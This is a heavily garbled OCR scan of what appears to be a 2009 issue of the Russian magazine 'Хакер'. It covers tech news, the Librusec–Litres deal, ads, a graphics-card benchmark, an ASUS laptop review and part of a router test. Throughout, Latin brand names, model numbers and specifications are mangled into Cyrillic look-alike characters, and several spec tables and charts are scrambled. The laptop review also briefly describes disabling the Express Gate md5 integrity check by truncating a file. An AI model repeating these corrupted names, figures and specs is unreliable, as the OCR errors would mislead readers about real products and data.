США, совсем недалеко от штаб-квартиры 
МісгозоЙ, в Редмонде, штат Вашингтон, открыла 
свои двери первая встране клиника лечения 
интернет-зависимости НеаѵепзИеІсІ Пеіхеаі 
Сепіег. Такого рода заведения есть и в других 
странах мира, в Китае, например, таких клиник 
уже более 200 и они фактически стали нормой. 
Однако на востоке все это мало напоминает 
реабилитационные центры, скорее, концлагеря 
или казармы. Там даже известны случаи, когда 
игровую и онлайновую зависимость«лечили» 
электрошоком илиже банальными побоями. 

В США все, разумеется, иначе — НеаѵепзбеШ 
Пеіхеаі Сепіегскорее похож на дорогостоящий 
курорт- 45-дневный курс геЗіаіі обойдется 
в $1 4.500, плюс ежедневные расходы. За эту 
сум му американские специалисты обещают из- 
бавить от пагубного пристрастия конлайновым 
играм, блогам, социальным сетям, СМСкам и 
любым другим достижениям прогресса. Некото- 
рых совсем отчаявшихся личностей кругленькая 
сумма, впрочем, не останавливает— клиника 
уже приняла первых пациентов. 




КОМПАНИЯ Ш5ТЕЕК ПРЕДУПРЕЖДАЕТ - ПОЧТИ 80 % КОМПОВ, НА 
К0Т0РЫХУСТАН0ВЛЕНЫ АСП0ВАТ КЕАРЕК И Н.А5Н - СЕРЬЕЗНО УЯЗВИМЫ. 
ПОМОГАЮТ ОТ ЗТ0Г0 КРИТИЧЕСКИЕ ОБНОВЛЕНИЯ, КОТОРЫЕ ИНОГДА ПОЛЕЗНО 
СТАВИТЬ ВОВРЕМЯ. 



Совет №1. 

Начинай утро 
с легкой разминки! 

Ни один компьютер не 
включится без загрузки. 
Она может быть быстрой 
или медленной, но она 
должна быть. Доказано, 
что физические упражне- 
ния полезны не только телу 
- они разгоняют кровь и 
стимулируют работу мозга, 
который, мы думаем, тебе 
очень пригодится в тече- 
ние дня! 



► 014 




РОССИЯ - РАЙ 

ДЛЯ ХАКЕРОВ 







совершенно несоразмерны выгоде 
оттакого рода преступлений. В ФБР и 
МсАІееуверены, что даже пойманные 
и отсидевшие свой срок российские 
хакеры будут рады вернуться к «темным 
делишкам» сразу по выходу изтюрьмы. 
Незабыли безопасники и шокировать 
публику статистикой, согласно которой, 
урон наносимый киберпреступниками 
только лишь США составляет $256 млн. 
в год. Впрочем, справедливости 
ради, стоитзаметить, что о тесной 
связи наших преступников с хаке- 
рами из США и других стран мира, 
всеже было сказано немало. 



С очень лестным для наших киберпре- 
ступников заявлением выступили на 
ежегодной конференции ВІаскНаІ: пред- 
ставители ФБР и секьюрити-компании 
МсАіюе. По их мнению, наши «кул хацке- 
ры» самые организованные и опасные в 
мире, и с ними нетолько крайнетрудно 
бороться, но и достать их в России почти 
невозможно. Отметили в ходе выступ- 
ления и тот факт, что наши наказания 
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ШАТКОЕ РАВНОВЕСИЕ 
ДОСТИГНУТО 

Ни для кого не секрет, что в рунете давным-давно развернулось 
противостояние йена жизнь, а на смерть между одной из крупнейших 
сетевых библиотек «Л и брусе к» [ ЬЛрУ/ІіЬ.гиз.ес І и правообладателя- 
ми. На протяжении двух лет противники копирайтов из «Либрусек» 
не отступали и не сдавались, а юзеры наполняли построенную на 
ѵѵікі-принципе библиотеку все новым и новым контентом. И, видимо, 
все уже настолько привыкли к постоянным ООоЗ-атакам на «Либру- 
сек» и кего ссорам с правообладателями, что внезапная весть о по- 
любовном договоре между библиотекой и «осью зла» — интернет-из- 
дательством электронных книг «Л итрес» (между прочим — коалиция 
бывших пиратов], для многих стала шоком. Хотя ничего шокирующе- 
го, если разобраться, не произошло. Достигнутый консенсус состоит 
в следующем: основные деньги, как известно, делаются на продаже 
новинок. В свете этого основатели «Либрусека» договорились с 
главой «Л итреса» Алексеем Кузьминым о том, что будут придержи- 
вать новые книги в течение месяца, запрещая их скачивание. Для 
этого полностью блокируется страница автора, дабы хитрые юзеры не 
сумели обмануть фильтры и автоматику. Важно заметить, что читать 
новые произведения в онлайне, как и раньше, можно безо всяких 
проблем на обоих ресурсах. Онлайн чтение, в свою очередь, будет со- 
провождаться показом рекламы, деньги за которую пойдут издатель- 




ству «Л итрес». По прошествии оговоренного месяца, когда новые 
книжки перестанут быть новыми, они станут доступны для скачивания 
в обычном порядке. При этом слив книг с «Либрусека» по-прежнему 
останется нелегальным занятием, а «Либрусек» — пиратами, но в 
«Л итресе», очевидно, готовы закрыть на это глаза. Прецедент весьма 
интересный, а паникующим юзерам, кричащим, что «Л ибрусекуже не 
тот!», хочется посоветовать почитать о том, какс пиратами борются на 
западе, а потом подумать еще раз. 




А51І5 ѴѴІ_-500дР Ѵ2 

больше чем ѴѴі-Рі роутер! 

V Адаптирован для России 

V Утилита быстрой настройки 
ѴѴі-Рі и Іпіегпеі 

новые возможности 

ЛЕГЕНДАРНОГО РОУТЕРА 






- Русский интерфейс пользователя для 
легкого управления и настройки сети 

-ѴѴі-Рі 125 Мбит/с 

- 2 порта ІІЗВ 2.0 для подключения жестких 
дисков, большинства принтеров и МФУ 

- Выделенные порты для подключения 
приставки ІРТѴ 

- А51І5 АЮізк - личный сетевой 
файл-сервер с доступом через Іпіегпеі: 




Всемирная гарантия 2 года ѴѴѴѴѴѴ.ЭЗІІЗ.Ги Горячая линия АЗІЭЗ: (495) 23-11-999 

Дистрибьюторы: БЮРОКРАТ (495) 745-55-11; Коосіоо ТесЬпоІодіез (499) 256-17-31; ОЮІ (495) 22-11-111; ПИРИТ-Дистрибуция (495) 974-32-10; ТКІШТѴ-ЕІ.ЕСТК0МІС8 ѵѵш.ігі-еі.ги 



Іпзрігіпд Іппоѵаііоп • Регзізіепі Регіесііоп 







ѴЕІ_І_Е* 



Сплойтпак 

для твоего здоровья 

30 часов на отладку ядерного руткита под ѴѴіпсІоѵѵз 7 , чипсы на завтрак, кола на 
обед, вчерашняя пицца на ужин. Знакомая ситуация? Парень, пора завязывать! 
Долго так не протянешь, время налаживать питание. 

приготовленный по аутентичному карельскому 
рецепту. Не содержит молока и обладает целым рядом клинически доказанных 
свойств: 

ѴеІІе повышает иммунитет и помогает твоему организму противостоять 
неблагоприятным условиям окружающей среды 
ѴеІІе нормализует пищеварение и устраняет дисбактериоз 
ѴеІІе защищает печень, выводя из организма токсины и яды 
Благодаря растворимым пищевым волокнам ѴІТАѴЕІЧ®, ѴеІІе благоприятно 
сказывается на работе сердца 




РЕКЛАМА 






РЕРВІІМ 



I СЕРГЕЙ НИКИТИН 



Чтобы 

качественно загамать 

ТЕСТИРОВАНИЕ СОВРЕМЕННЫХ ГРАФИЧЕСКИХ АДАПТЕРОВ 

Если, несмотря на финансовый кризис, ты все-таки решил обновитьви- 
деоподсистемусвоего компьютерадоты выбрал удачное время. Весной 
ведущие производители выпустили на рынок новые чипы, количество 
новых плат сейчас велико, а цены благоволят к покупке. Выбирай подхо- 
дящую плату и играй до нового учебного года! 



МЕТОДИКА 

ТЕСТИРОВАНИЯ 

Исследование производительности платпро- 
водилосьс помощью двух типов инструментов 
— синтетических и игровыхтестов. Кпервым от- 
носились ЗОМагк 2006 (немного устаревший, но 
все еще помогающий понять, насколько сильна 
та или иная плата] и ЗБМагк Ѵапіаде — совре- 
менный тест, заточенный под ОігесіХ 10. Вторая 
часть испытаний состояла из игровыхтестов. 

Мы использовали Сгузіз, СТА IV и ТЬе 5ітз 3 — 
популярные игрушки, которые требуют мощную 
видеоплату. Естественно, мы не забыли отом, 
что мощность всегда идет рука об руку с тепло- 
выделением, поэтому использовали функцию 
отслеживания температуры графического чипа 
утилиты Ріѵа Типег (замер проводился после 
основательной нагрузки —трехкратного прого- 
на ОРІІТезЕа Сгузіз]. Кстати, если послетакой 
нагрузки температура резко поднималасьдо 
тест повторялся (то есть, был шестикратным], 
чтобы понять, какая же температура является 
для видеоплаты рабочей вусловиях повы- 
шенной нагрузки. Если же послетрехзапусков 
температура стабилизировалась до никаких 
дополнительных действий не предпринима- 
лось. Крометого, мы оценивали комплектацию, 
систему охлаждения и наличие у видеоплаты 
дополнительных возможностей. 



ТЕХНОЛОГИИ 

Большинство плат, участвующих в нашем сегод- 
няшнемтесте, построены на графических про- 
цессорах, которые уже исследованы в тестовых 
лабораториях вдоль и поперек. Мы тоже уже не 
раз писали об их особенностях. Поэтому сейчас 
мы не будем обсуждать количество шейдеров и 
мегагерц, а напомнимтебе несколько простых, 
но важных правил, о которых люди нередко 
забываютв погонеза идеальной, по их мнению, 
видеоплатой. Во-первых, незабывай про 
физические размеры платы — если твой корпус 
невеликили сильнозабит, то могутбыть пробле- 
мы сустановкой. Во-вторых, объективно оцени 



систему охлаждения своего ПК — несмотря на 
мощные кулеры на платах, они основательно 
греются и греют других, что ведет к различным 
глюкам. Возможно, тебе понадобится пара 
дополнительных вентиляторов. В-третьих, не 
всегда стоит переплачивать за последнюю 
модель — на рынке огромное количество плат 
предыдущего поколения, чьей мощности будет 
хвататьеще оченьдолго, а стоятони значитель- 
нодешевле. И, в-четвертых, оценивай комплект 
поставки — производитель может бесплатно 
набить коробку подарками, а иногда, наоборот, 
за вложенный переходник просят несколько 
десятков лишних баксов. 



Г 



СРѴ5ІЗ 1680X1050, НІ6Н, 6РУ ТЕЗТ (РР5) 


2о1ас ОеРогсе 0ТХ275 Атр! 
2о*ас ОеРогсе 6ТХ260 Атр! 
2о1ас ОеРогсе СТ5 250 Атр! 
БаррЫге Касіеоп НЮ 4890 
БаррЫге Касіеоп НЮ 4850 
АТІ Касіеоп НЮ 4770 

с 














) 5 10 15 20 25 30 35 



► 018 



ХАКЕР 09 /129/ 09 






I ТЕСТОВЫЙ 

ПРОЦЕССОР: ШЕІ. СОРЕ 2 0110 Е8400 

МАТЕРИНСКАЯ ПЛАТА: А5Ц5 Р50 ОЕШХЕ 
ОПЕРАТИВНАЯ ПАМЯТЬ. ГБ: 4. С0К5АІР ХМ52 Ш2 
ЖЕСТКИЙ ДИСК. ГБАЙТ: 640. ѴѴО, 7200 ОБ/МИН 
БЛОК ПИТАНИЯ. КВТ: 1. ТНЕРМАШКЕ 
ОПЕРАЦИОННАЯ СИСТЕМА: ѴШ00ѴѴ8 ѴІЗТА 



СПИСОК ПРОТЕСТИРОВАННЫХ УСТРОЙСТВ 

АТІРАОЕОІШ4770 
5АРРНІРЕ РАОЕОИ Нй 4850 
ЗАРРНІРЕРАОЕОІШ4890 
20ТАС ВЕРОРСЕ 6Т5250 
20ТАС 6ЕР0РСЕ ОТХ 260 
20ТАС 6ЕР0РСЕ 0ТХ 275 




АТІ РаОеоп 

НО 4770 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ГРАФИЧЕСКИЙ ПРОЦЕССОР: АТІ ПѴ740 
ТЕХПРОЦЕСС, НМ: 40 
РАЗЪЕМЫ: 2хОѴІ 

ДОПОЛНИТЕЛЬНОЕ ПИТАНИЕ: 1 хб пин 
ЧАСТОТА ПРОЦЕССОРА, МГЦ: 750 
ЧАСТОТА ПАМЯТИ, МГЦ: 1 1 00 
ТИП ПАМЯТИ: ОООП5 
ОБЪЕМ ПАМЯТИ, МБ: 512 
П0ДДЕРЖКА51_І/СК055НРЕ:да 

••••••••00 




Мге Рагіеоп 

850 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ГРАФИЧЕСКИЙ ПРОЦЕССОР: АТІ РѴ770 
ТЕХПРОЦЕСС, НМ: 55 
РАЗЪЕМЫ: 2хОѴІ, 1 х 5-ѴісІео 

ДОПОЛНИТЕЛЬНОЕ ПИТАНИЕ: 1x6 пин 
ЧАСТОТА ПРОЦЕССОРА, МГЦ: 625 
ЧАСТОТА ПАМЯТИ, МГЦ: 1 000 
ТИП ПАМЯТИ: ОООПЗ 
ОБЪЕМ ПАМЯТИ, МБ: 51 2 
П0ДДЕРЖКА5І_І/СР055РІВЕ: да 




Основанная на недорогом современном чипсете, плата наверняка 
будет популярна утех, кто стремится выбирать устройства, исходя из 
наилучшего соотношения качества и цены. Новый техпроцесс (40 нм] 
позволил разработчикам добиться хороших характеристик: частота ГП 
составляет 750 Мгц, плата обладает небольшими размерами, которых 
вполне достаточно, чтобы установитьна ней небольшой турбокулер. 
Модель оснащена 512 Мб графической памяти ОООП5, — хватит для 
современных игр (а цена устройства не возрастает от никому не нужных 
дополнительных мегабайт]. Вендорустановил рекомендуемую цену на 
уровне 109 долларов, так что резерв падения цены есть — можно немно- 
го подождать и сэкономить. 

0 

Главным недостатком платы является крайнеузкая (128 бит] шина 
памяти, которая не позволяетей достичь более впечатляющих скоро- 
стных высот. С другой стороны, учитывая ценовой сегментустройства и 
его результаты в тестах, можно сказать, что свои деньги оно полностью 
отрабатывает. 



ООО 




Очень широко распространенная, проверенная временем и много- 
численными тестами графическая плата отЗаррЫге. Если тебе нужен 
недорогой видеоадаптер, а заморачиваться с выбором по каким-то 
причинам нехочется, смело покупай ее. Она исследована вдоль и попе- 
рек, мы сравнивали ее с множеством других плат. Устройство надежно и 
достаточно производительно, проблем с ним возникнуть не должно. Сто- 
имость уже устоялась и составляет примерно 4000 рублей, но с выходом 
плат на новых чипах можетснизиться. Плата обладает всеми достоинс- 
твами изделий ЗаррЫге, а именно — качеством и надежностью. 

0 

Есть проблема с охлаждением. В принципе, если у тебя просторный 
корпус и много вентиляторов, то трудностей быть не должно, но если 
он забит, устройствам в нем тесно, а вентиляторов мало, то проблемы 
практически гарантированы. И, конечно, с разгоном нужно быть очень 
осторожным. 



ХАКЕР 09 /1 29/ 09 
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РЕРВІІМ 





ТНЕ ЗІМЗ 3, 1680X1050, ШКА НІСН (РРЗ) 



АТЫ НА ГП ЫѴШІА, В ОСНОВНОМ, ОПЕРЕЖАЮТ 
АТІ-ШНЫЕ, НО ДАЖЕ НА САМОЙ СЛАБОЙ ИГРА 
ИДЕТХОРОШО 



5875 руб 



2о*ас беРогсе 6ТХ 275 Атр! 

2о*ас беРогсе 6ТХ260 Атр! 

2о*ас беРогсе 6Т5 250 Атр! 

БаррЫге Васіеоп Нб 4890 
БаррЫге Васіеоп Нб 4850 
АТІ Васіеоп Нб 4770 

О 10 20 30 40 50 60 70 



йгіас беРогсе 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ГРАФИЧЕСКИЙ ПРОЦЕССОР: АТІ РѴ790 
ТЕХПРОЦЕСС, НМ: 55 



6ТЗ 250 Атр! 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 



РАЗЪЕМЫ: 2хбѴІ, 1 х 5-ѴісІео 

ДОПОЛНИТЕЛЬНОЕ ПИТАНИЕ: 2x6 пин 
ЧАСТОТА ПРОЦЕССОРА, МГЦ: 850 
ЧАСТОТА ПАМЯТИ, МГЦ: 975 
ТИП ПАМЯТИ: СБОРб 
ОБЪЕМ ПАМЯТИ, МБ: 1024 
ПОДДЕРЖКА 5Ы/СВ055РІВЕ: да 



ГРАФИЧЕСКИЙ ПРОЦЕССОР: 692Ь 
ТЕХПРОЦЕСС, НИ: 55 
РАЗЪЕМЫ: 2хБѴІ, 1х 5-ѴісІео 

ДОПОЛНИТЕЛЬНОЕ ПИТАНИЕ: 1x6 пин 
ЧАСТОТА ПРОЦЕССОРА, МГЦ: 750 
ЧАСТОТА ПАМЯТИ, МГЦ: 1 1 50 
ТИП ПАМЯТИ: О О ОРЗ 
ОБЪЕМ ПАМЯТИ, МБ: 1024 
П0ДДЕРЖКА5Ы/СР055РІРЕ: да 




Учитывая цену этого устройства, мы смело можем назвать его одним из 
лучших по соотношению цены и качества. Благодаря высоким частотам 
работы и гигабайту памяти, БаррЫге Васіеоп НБ 4890 демонстрирует 
высокую производительность. При этом она имеет неплохой разгонный 
потенциал, так что если тебе нужна дополнительная скорость, ты легко 
сможешь ее получить. Размеры устройства невелики, что существенно 
расширяет возможности по установке в небольшие или сильно запол- 
ненные корпуса. На плате распаяны два 6-контактных разъема. Очень 
удачная схема питания. 

0 

Основным недостатком платы стала ее система охлаждения: достаточно 
слабая, но при этом шумная. Такое положение дел осложняет разгон 
платы, что особенно обидно, учитывая, что потенциал для оверклокинга 
у нее есть. Установив ЗаррЫге Васіеоп НБ 4890 в небольшой тесный 
корпус, мы получили рабочую температуру в 78 градусов — это есть очень 
плохо. Думаю, скоро на рынке появятся такие платы с продвинутым куле- 
ром. Так что, если ты любишь разгон, то имеет смысл немного подождать 
с покупкой. 



О О 




Старый добрый графический процессор С92от компании ІМѴЮ ІА воз- 
вращается в новом облике — с литерой Ь в названии. Что она означает? 
Новый 55 нмтехпроцесс, возросший объем памяти и повышенные 
частоты. Естественно, мы получаем более высокую производительность. 
Кроме того, плюсом платы, по сравнению с более ранними изделиями 
на ГП ІЧѴІБІА, можно назвать более продуманную систему охлаждения, 
которая, правда, стала заниматьдва слота. Специалисты 2оІас произве- 
ли небольшой заводской разгон этой платы, о чем говорит слово «Атр!» 
в названии. 

0 

Цена платы возросла и стала явно завышенной, ведь десяток мегагерц 
любой человеквыжметобычнымтюнером слюбой платы. Врядли стоит 
за это переплачивать. Если твой корпус плотно забитустройствами, то, 
возможно, нужно будет решать проблемы с перегревом; плата, несмотря 
ни на что, пышет жаром. С другой стороны, в просторном и хорошо венти- 
лируемом корпусе проблем быть не должно. 



► 020 
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РЕРВІІМ 




НАПРИМЕРЕХОРОШО ВИДНО, 
СТОИТ ЛИ ПЕРЕПЛАЧИВАТЬ 
ЗА НАИБОЛЕЕ МОЩНУЮ ПЛАТУ 
ИЛИ ОГРАНИЧИТЬСЯ С 
РЕДНЕСТАТИСТИЧЕСКОЙ 



6ТА IV, 1680X1 050, НІбН(РРЗ) 



2 оІас беРогсе 6ТХ275 Атр! 
2оІас беРогсе 6 ТХ 260 Атр! 
2оІас беРогсе 6Т5 250 Атр! 
БаррМге Расіеоп НО 4890 
БаррЫге Расіеоп Нб 4850 
АТІ Расіеоп Нб 4770 



2оІас беРогсе 



6ТХ260 Атр! 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ГРАФИЧЕСКИЙ ПРОЦЕССОР: 6Т200 
ТЕХПРОЦЕСС, НМ: 65 



2оІас беРогсе 

6ТХ 275 Атр! 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 



РАЗЪЕМЫ: 2хбѴІ, 1 х 5-ѴісІео 

ДОПОЛНИТЕЛЬНОЕ ПИТАНИЕ: 1 хб пин 
ЧАСТОТА ПРОЦЕССОРА, МГЦ: 650 
ЧАСТОТА ПАМЯТИ, МГЦ: 1 050 
ТИП ПАМЯТИ: СООРЗ 
ОБЪЕМ ПАМЯТИ, МБ: 896 
ПОДДЕРЖКАБЫ/СРОББРІРЕ: да 

•••••••ООО 



ГРАФИЧЕСКИЙ ПРОЦЕССОР: СТ2006 
ТЕХПРОЦЕСС, НМ: 55 
РАЗЪЕМЫ: 2хбѴІ, ІхС-Ѵібео 

ДОПОЛНИТЕЛЬНОЕ ПИТАНИЕ: 2x6 пин 
ЧАСТОТА ПРОЦЕССОРА, МГЦ: 702 
ЧАСТОТА ПАМЯТИ, МГЦ: 1 260 
ТИП ПАМЯТИ: еоокз 
ОБЪЕМ ПАМЯТИ, МБ: 896 
ПОДДЕРЖКАБЫ/СРОББРІРЕ: да 



Еще одна плата, построенная на не совсем новом, скажемтак, графичес- 
ком чипсете. А говоря прямо — ГП ІЧѴЮІА6Т200 старый и проверенный 
каквременем.таки геймерами, и различнымитестовыми лаборатория- 
ми. Но, несмотря на это, по-прежнему вызываетопределенный интерес, 
так как обладает достаточно высокой производительностью, а более 
новые модели на ГП ОТХ275 стоят на парутысяч дороже. Разница в цене 
существенная, а вот в скорости... Тем более, данная модель Атр! уже 
подвергласьтюнингу на родном заводе, причем ГП стал работать на 
650 МГцвзамен штатных575, да и память разогнали на 50 МГц. Система 
охлаждения занимает два слота, но зато отлично работает — проблем с 
перегревом нами замечено не было. Пусть чип тут стоит не новый, изде- 
лие получилосьочень интересным. 



0 

Впрочем, многим это не понравится — есть люди, которые стремятся 
по купать толь ко последние версии. Еще одна проблема — модификацию 
Атр! не так-то просто найти в продаже. 



О О 



Что новыйтехпроцессделаетс платами, вытолько посмотрите! И 
процессор графический у этой платы быстрее, и память более произво- 
дительная. Да еще и на заводе постарались, разогнали. По сравнению 
с устройствами на 6ТХ260, плата стала гораздо быстрее. В остальном же 
все осталось та ким же — и внешность, и размеры, и система охлаждения. 
Стемпературой получился интересный казус: более совершенныйтех- 
процесс, естественно, снизил тепловыделение, но повышенные частоты 
работы ГП и памяти вернули его на уровень ІЧѴЮІА СеЕогсе 6ТХ260. 



0 

Главный недостаток этого графического адаптера — его цена. В общем и 
целом, конечно, она соответствует той производительности, которую эта 
плата предлагает, но конкуренты на базе АТІ с похожей скоростью стоят 
уже дешевле... Постарайся найти это устройство с какой-нибудь скидкой 
тысячи в полторы — и такой покупкой ты выбьешь десятку! 



выводы 

Проведенный нами тест интересен тем, что 
позволяетсравнить новые платы с постро- 
енными на моральноустаревших чипсетах 



и понять, стоить ли тратить деньги только за 
то, что устройство свежее и модное. Выбор, 
как всегда, за тобой. Приз «Выбор редакции» 
сегодня получает СаррЫге Вабеоп НО 4890 — 
новое и оченьудачное устройство. А«Лучшая 



покупка» достается Іоіас СеЕогсе СТХ 260 
Атр! — сбалансированное решение по хоро- 
шей цене, □с 







МИНЗДРАВСОЦРАЗВк 


ПИЯ РОССИИ ПРЕДУПРЕЖДАЕТ: 


КУРЕНИЕ ВРЕДИ 


НАШЕМУ ЗДОРОВЬЮ 






РЕРВІІЛЛ 



■ ■ ФЕДЯ ЧЕРЕНКОВ 



А51І8 ІІ50Ѵд 

5 фишек нового ноутбука от А51І5 

Откроютебе небольшой секрет — наш редактор Андрей Матвеев 
не признает настольные компьютеры в принципе. Зато в его распоря- 
жении сразу несколько добротных ноутбуков с разными ОС, которые 
и выступают в роли рабочих лошадок. Это, конечно, дело вкуса, но с его 
доводами сложно не согласиться. 








іпіеі) 



Сепшпо 



іпзіде 



Ищи знак 

Іпіеі 

Іпзісіе® 



Давно прошли времена, когда ноутбуки серьезно проигрывали 
обычным компам в плане производительности. Сейчаслегко можно 
приобрести машинку с быстрым процессором Іпіеі, кучей оперативки 
и шустрой видеокартой. И если раньшетакой навороченный бук стоил 
целое состояние, то сейчас найти подобную рабочую лошадку можно за 
вполне адекватные деньги. Но самые обычные буки нам неинтересны, 
поэтому мы решили поискать машинку с «фишками». Таким ноутбуком 
оказался новый А51І5 1)50Ѵд, построенный на базе процессорной тех- 
нологии Іпіеі® Сепігіпо® 2. Он оснащен производительным мобильным 
процессором Іпіеі® Соге™ 2 ОиоТббОО с частотой 2.1 Ггц и 3 Гб памяти. 



ФИШКА 1: 

ЭРГОНОМИКА 

Первое, о чем хочется рассказать, — это крайне привлекательный 
вид ноутбука. Несмотря на диагональ в 1 5.6", кажется, что его можно 
брать с собой повсюду. Виной тому — минимальная толщина ноутбука 
(33 мм], благодаря которой модель выглядит намного изящнее своих 
соратников. Как и многие современные модели ноутбуков, ІІ50Ѵд 
оснащен эргономичной клавиатурой. Она имеет большой ход клавиш 
и увеличенное расстояние между ними, что способствуетснижению 
количества ошибок при печати. Но это еще не все - у клавиш есть 
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ВНУТРЕННОСТИ А51І5 ІІБОѴд 

• Процессор: ІгШеІ® Соге™ 2 Т 6500, 2.1 Ггц 
Поддерживаеттехнологию ЕпЬапсесІ ІгШеІ 
ЗреесІЗіер 

• Процессорная технология ІгШеІ® СегШгіпо® 2 

• Оперативка: 3 Гб (две планки:на1 и 2 Гб) , 
максимальный объем 4 Гб 

• НББ: 320 Гб 

• Дисплей: 1 5.6" с поддержкой Н Б- в идео 

• ѴѴІ_АІ\І: 802.1 1 Ь/д , ВІиеіооіЬ 

• Бонусы: беспроводная мышь, удобная сумка 



подсветка, которая не только классно выглядит в темноте, но и позво- 
ляет комфортно работать при любом уровне освещенности. 

Вес ноутбука составляет 2.56 кг, что совсем немного для такой машин- 
ки. Правда и аккумулятор большой в него не ставится: стандартная 
емкость батареи составляет 4400 мАч, которая в среднем выдавала 
мне почти 3 часа автономной работы. 

ФИШКА2: 

АВТОМАТИЧЕСКАЯ ПОДСВЕТКА 

Одна из классных фич этой модели — адаптивная регулировка ярко- 
сти экрана и подсветки клавиатуры. Специальный датчик, оцени- 
вающий освещенность, встроен в рамку экрана: оттого, насколько 
светло вокруг, соответствующим образом меняется и подсветка. 

Если вечером выключить в помещении свет, немедленно включится 
подсветка клавиш: всего у нее 3 уровня яркости. Заметить разницу в 
изменении подсветки экрана сложнее, нотакже можно. И, конечно, 
никто не мешает отрегулировать ее вручную. 

ФИШКАЗ: 

КЛАССНЫЙ МУЛЬТИТАЧ 

Приятно, что производители ноутбуков (а вернее —тачпадов] 
наконец-то реализовали полноценные функции мультитача. Теперь 
изменить масштаб документа или, что я лично обожаю, скролить доку- 
менты можно двумя пальцами. Чрезвычайно эффективно и удобно. Но 
в случае с данной моделью это еще не все сюрпризы. При прикос- 
новении ктачпаду на нем появляется светящаяся полоска, которая 
перемещается в соответствии сдвижением пальцев. Нереально 
классный эффект, который тутже с приятным удивлением отмечают 
все, кто увидит тебя за работой :). 

ФИШКА 4: 

ЭФФЕКТНЫЙ ВХОД В СИСТЕМУ 

На модели ІІ50Ѵд нет системы для входа по отпечатку пальца, но это 
и не надо. Едва литы будешьтаскать свой ноутбуке собой посто- 
янно там, где его придется лочить. Ктомуже, на этой модели есть 
прикольная система ЗтагШодоп, идентифицирующая человека по 
изображению, которое она получаете веб- камеры. ЗтагШодоп ловко 
выделяет из изображения очертания лица и сравнивает с образцами, 
после чего разрешает или не разрешает Іодоп в систему. Понятно, что 
сначала надо немного обучить программу. Более того — это придется 
выполнить несколько раз, в условиях разной освещенности. 

ФИШКА5: 

РАБОТАЕМ ВООБЩЕ БЕЗ ОПЕРАЦИОННОЙ 
СИСТЕМЫ 

Да -да. В случае с ІІ50Ѵд можно вполне успешно пользоваться буком 
без загрузки операционной системы Майкрософт. Ты спросишь: «Как 
это возможно, ведь без операционки, вообще говоря, не обойтись?» 
Но с ноутбуком действительно можно работать, даже не запуская 



основную операционную систему — благодаря классной технологии — 
Ехргезз ЭаШ. На ней мы остановимся подробнее. 

Такая встроенная операционка основана на Еіпих’е и ее возможность 
установки изначально вшита в материнскую плату. Активировать 
Ехргезз баШтебе предлагается во время загрузки ноутбука: пара 
мгновений — и она устанавливается на любой доступный раздел, 
будьтот на ІЧТЕ5 или ЕАТ. Подойдет даже твой основной системный 
диск: инсталлятор лишь разместит на нем несколько своих служебных 
файлов. А что в итоге? В итоге ты получаешь операционную систему, 
которая запускается через, держись крепче, 8 секунд после запуска! 
Да, большой функциональности от нееждать глупо. Ноты можешь 
работать с браузером, позвонить, используя 5куре и, естественно, 
обратиться к файлам на своем жестком диске. Что бы ни случилось 
с основной системой, утебя всегда останется возможность работы с 
ноутбуком. И... это еще не все! 

Разве ж мы могли ограничиться лишь тем, что предлагают разработ- 
чики, не попробовав запихнуть в эту систему что-то свое? Не смогли :]. 
При первом исследовании стало ясно, что всю информацию ОС хранит 
в файлах .здх/.ісІх/.Ьіп в разделе, который мы указали при установке. 

Мы знали, что 50Х-файлы — это не что иное, как контейнер для сжатой 
файловой системы здиазІШз версии 3.0, а работать сними можно с по- 
мощьюутилиты здиазІШз-ІюоІз. Послетого, как мы добавили в архив 
несколько би на рн и ков из ОеЬіап, столкнулись с вполне ожидаемой 
проблемой: ОС проверяет целостность своих «образов», не призна- 
вая левые здх’ы. Обойти такую проверку несложно: тб5-суммы здх- 
файлов хранятся в файле ѵегзіоп, а защита легко отключается путем 
урезания файла до первых 32 байт. После этой нехитрой операции 
добавлять в систему Ехргезз ОаШ можно все, что угодно. 

Вообще, как ни крути, а модель у А51І5 вышла очень удачная. Даже 
если не брать в расчет интересные нововведения, мы получаем 
отличный и проработанный ноутбук. Взять хотя бы расположение 
ІІ5В-портов, которые разнесены по разным краям корпуса, чтобы не 
мешаться другдругу. Дома я насладился еще одним преимуществом 
таких ноутбуков, подключив ІІ50Ѵд ктелевизору, используя Н Б М I - 
разъем. Ни на одном из моих маленьких компьютеров такой возмож- 
ности не было :]. 




ТРЕ№СШВ 



ТРЕЫБ СШВ — дискуссионный клуб для тех, кто интере- 
суется прогрессом и задумывается о будущем. Участники Тгепб 
С Іи Ь обсуждают технические новинки, информационные техно- 
логии, футурологию и другие темы завтрашнего дня. Тгепб С Іи Ь 
поддерживается компаниями ІпШІ и А51І5 и проводит регулярные 
конкурсы с ценными призами. 

Корпорация Іпіеі, ведущий мировой производитель инновацион- 
ных полупроводниковых компонентов, разрабатываеттехнологии, 
продукцию и инициативы, направленные на постоянное повы- 
шение качества жизни людей и совершенствование методов их 
работы. Дополнительную информацию о корпорации I пЕе I можно 
найти на ѴѴеЬ-сервере компании Іпіеі ѵѵѵѵѵѵ.іпіеЕги . а также на сайте 
ШрУ/Ыодз.іпІеЕсот . Для получения дополнительной информации 
о рейтинге процессоров Іпіеі посетите сайт ѵѵѵѵѵѵ.іпІеЕги/гаІіпс . □С 
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РЕВВІІМ 



■ ■ АЛЕКСЕЙ ШУВАЕВ 



Быстрый ѴРЫ 

ТЕСТИРОВАНИЕ РОУТЕРА АБУБКТ-ЫіЗ 

Роутер дома — уже не излишество, а скорее необходимость. 
Проникновение техники в нашу жизнь таково, что заказать продукты, 
посмотреть фильм или пообщаться сдрузьями можно, не вставая с 
кресла. Чтобы не ломать голову, какже все устройства объединить 
в единую сеть и обеспечить доступ в интернет, мы решили провести 
тестирование нового маршрутизатора А51І5 ГСТ-ЫіЗ. 



РЕЗУЛЬТАТЫ ТЕСТА: 

І_АЫ ТО ѴѴАЫ ( N АТ) 112 МБИТ/С 
І_АЫ ТО ѴѴАЫІѴРЫ): 19 МБИТ/С 
І_АЫ ТО ѴѴІ-РІ 54 ( 5 МБИТ/С 



ТЕХНИЧЕСКИЕ 

ХАРАКТЕРИСТИКИ: 

